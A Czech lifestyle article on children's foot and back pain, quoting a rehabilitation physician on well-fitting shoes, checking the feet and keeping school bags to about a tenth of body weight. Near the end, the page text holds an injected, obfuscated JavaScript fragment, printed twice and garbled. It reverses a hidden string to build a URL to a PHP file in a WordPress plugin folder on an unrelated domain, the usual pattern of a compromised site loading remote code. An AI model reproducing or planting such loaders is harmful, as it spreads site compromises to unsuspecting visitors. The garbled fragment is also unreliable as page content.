FACESTARŽivotní stylTŘETINA PRVŇÁČKŮ HLÁSÍ BOLESTI ZAD ČI NOHOU! PŘÍČINOU MOHOU BÝT ŠPATNÉ BOTY...

TŘETINA PRVŇÁČKŮ HLÁSÍ BOLESTI ZAD ČI NOHOU! PŘÍČINOU MOHOU BÝT ŠPATNÉ BOTY I AKTOVKA!

Jak na zdravé dětské nožky

Jak na zdravé dětské nožky

Pokud vaše dítě často bolí nohy, zkontrolujte nejprve jeho obuv. Může být přliš těsná, může mít špatnou velikost, nebo může být vyrobena z nevhodného materiálu. „Zkuste si nejdříve dětskou nožičku prohlédnout. Všímejte si hlavně tvaru a symetrie plosky nohy. Zdravé chodidlo je obloukovitě vyklenuté, bez deformit prstů, bez otlaků, mozolů či jiných výrůstků. Pokud si nejste jistí nebo potíže potomka přetrvávají, vyhledejte pomoc odborného lékaře, který dítě vyšetří, ukáže vám vhodné cviky pro zdravé nohy, nebo navrhne rehabilitaci,“ doporučuje primářka Michaela Tomanová.

Když nejsou zdravé nohy, má dítě potíže s chůzí, a to zatěžuje i páteř. Ta pak o sobě dává vědět bolestí. Bolest bychom rozhodně neměli podceňovat, protože je prvním příznakem toho, že něco není v pořádku „Dětská noha roste rychle, proto nezapomínejte pravidelně kontrolovat, zda jsou boty dostatečně velké. Obuv vybírejte pokud možno z přírodních materiálů. Dbejte rovněž na to, abyste dítě nepřetěžovali dlouhým chozením po tvrdém povrchu – například v supermarketu. Dobré je dětem v létě čas od času dopřát běhání naboso po trávě nebo písku, což prospívá vývoji jejich nožiček,“ uzavírá primářka Rehabilitačního ústavu Brandýs nad Orlicí Michaela Tomanová.

Kolik má vážit aktovka

Víte, že školní taška by měla vážit 10 % hmotnosti dítěte? Zkuste svému školákovi aktovku doma zvážit. Možná zjistíte, že je daleko těžší. Pokud chcete dětem zajistit dobrou kondici nyní i do budoucna a vyhnout se zdravotním problémům, které by je mohly trápit i v dospělosti, měli byste dítěti pořídit vhodnou aktovku. MUDr. Tomanová také nedoporučuje malým školákům nosit batohy. Aktovka má pevnější konstrukci a lépe řešený úložný prostor. Váha předmětů v aktovce se lépe rozloží a není to pro záda taková zátěž. Batohy jsou vhodné až pro starší děti.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandys_nad_Orlici.jpg“ /> and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandys_nad_Orlici.jpg“ />

 

Související články